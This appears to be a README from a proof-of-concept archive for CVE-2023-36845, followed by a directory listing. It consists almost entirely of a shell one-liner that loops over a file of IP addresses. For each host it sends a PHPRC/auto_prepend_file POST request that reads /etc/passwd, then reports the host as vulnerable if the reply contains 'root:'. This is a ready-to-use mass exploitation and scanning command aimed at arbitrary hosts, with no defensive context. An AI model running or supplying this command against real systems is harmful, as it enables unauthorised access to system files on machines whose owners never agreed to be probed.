# CVE-2023-36845
Mass check One liner CVE-2023-36845
cat ip.txt| while read host do;do curl -sk "http://$host/?PHPRC=/dev/fd/0" -X POST -d 'auto_prepend_file="/etc/passwd"'| grep -i 'root:' && echo $host "is VULNERABLE";done
[4.0K] /data/pocs/70964d3edb610482000d3d6f7b6411473c872af9
└── [ 227] README.md
0 directories, 1 file